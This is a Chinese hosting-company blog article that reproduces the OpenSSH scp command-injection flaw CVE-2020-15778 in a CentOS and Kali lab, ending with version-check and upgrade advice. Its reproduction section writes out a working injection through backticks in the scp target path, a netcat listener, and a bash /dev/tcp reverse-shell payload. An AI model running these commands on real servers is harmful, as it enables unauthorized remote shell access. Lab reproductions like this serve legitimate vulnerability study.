意见箱
恒创运营部门将仔细参阅您的意见和建议,必要时将通过预留邮箱与您保持联络。感谢您的支持!
意见/建议
提交建议

CVE-2020-15778漏洞复现是怎样的

来源:恒创科技 编辑:恒创科技编辑部
2023-12-03 04:50:59

今天就跟大家聊聊有关CVE-2020-15778漏洞复现是怎样的,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

1.漏洞描述

(1)简介:2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。

(2)scp介绍:scp是Linux下基于 ssh 登陆进行安全的远程文件拷贝命,用于不同Linux系统之间复制文件和目录。该命令由openssh的scp.c及其他相关代码实现。在本次漏洞复现中就是利用scp命令把一个kali系统的文件传输给Linux系统。


CVE-2020-15778漏洞复现是怎样的

(3)漏洞类型:命令执行

(4)漏洞影响版本:OpenSSH <= 8.3p1

2.环境搭建

虚拟机安装CentOS和kali靶机环境:CentOS6,ip:192.168.5.138渗透机环境:Kali 2020,ip:192.168.5.130

3.centos机使用iptables策略配置环境,禁用ssh登录,只保留scp。

(1)安装iptables(需要root用户)

yum install -y iptables

安装错误,接下来根据提示删除/var/cache/yum/i386/6/base/mirrorlist.txt文件

rm /var/cache/yum/i386/6/base/mirrorlist.txt

没有找到文件,下面安装tree测试一下yum命令是否能够正常使用

yum install -y tree

还是报一样的错误,证明yum功能无法使用,上网查看yum无法使用解决办法。只需要在centos命令行界面下执行一下几条命令

sed -i "s|enabled=1|enabled=0|g" /etc/yum/pluginconf.d/fastestmirror.confmv /etc/yum.repos.d/CentOS-Base.repo /etc/yum.repos.d/CentOS-Base.repo.backupcurl -o /etc/yum.repos.d/CentOS-Base.repo https://www.xmpan.com/Centos-6-Vault-Aliyun.repoyum clean allyum makecache

执行完成之后再次尝试安装iptables

yum install -y iptables

(2)安装iptables-services

yum install iptables-services

(3)设置策略,禁止ssh登陆,保留scp

iptables -F //清空默认规则service iptables start //启动iptables服务iptables -t filter -A INPUT -p tcp --dport 22 -m tos --tos 0x10 -j DROP //配置iptablesservice iptables save //保存iptables配置iptables -L -n --line-number //显示iptables的规则和相对应的编号

(4) 在kali机测试ssh与scp在已设置iptables策略下的使用情况(需要root权限)

echo "123456" >1.txt //输入123456到当前目录下的1.txt文件scp 1.txt root@192.168.5.138:/tmp/h.txt //拷贝1.txt文件到centos机的/tmp/h.txt文件中ssh@root192.168.5.138 //直接使用ssh连接centos机

scp功能正常使用,ssh连接centos失败,证明iptables策略(禁用ssh登录,只保留scp)成功有效。

4.漏洞复现

前提:需要知道centos的ssh账号密码

(1)查看CentOS的ssh版本

ssh -v

(2)首先尝试一下利用scp命令,用kali对centOS进行写文件,复制文件。

scp 1.txt root@192.168.5.138:'`touch /tmp/test.txt` /tmp'

成功将kali上面的文件传入道centOS上面。

(3)在kali机上监听5555端口

nc -lvp 5555

(4)进行反弹shell

scp test.txt root@192.168.5.138:'`bash -i >& /dev/tcp/192.168.5.130/5555 0>&1`/tmp/test1.txt'

(5)在kali机的监听界面执行任意系统命令,比如使用ifconfig可以查到centos机的ip。

5.总结

有人可能觉得已经拿到ssh的用户名和密码了,直接ssh进去不就好了,回想过程,环境配置中禁用了ssh登录,只保留scp。不能直接使用ssh连接,我们是通过scp调用ssh,完成连接。该漏洞复现简单,漏洞危害大,利用局限性很大,需要ssh的用户密码。如果我们找到目标用户的用户名和密码,而且目标用户关闭了ssh,但是开启scp,那我们就可以利用这种漏洞反弹shell获取权限。

6.漏洞修复

(1)检测方法输入ssh -v命令查看openssh版本如显示的版本号<= 8.3p1,则漏洞存在。

(2)修复方案升级补丁。

看完上述内容,你们对CVE-2020-15778漏洞复现是怎样的有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注恒创行业资讯频道,感谢大家的支持。

上一篇: mysql直接拷贝data目录下数据库源文件还原数据库方法 下一篇: 疑似CVE-2020-0968远程代码执行漏洞被发现的示例分析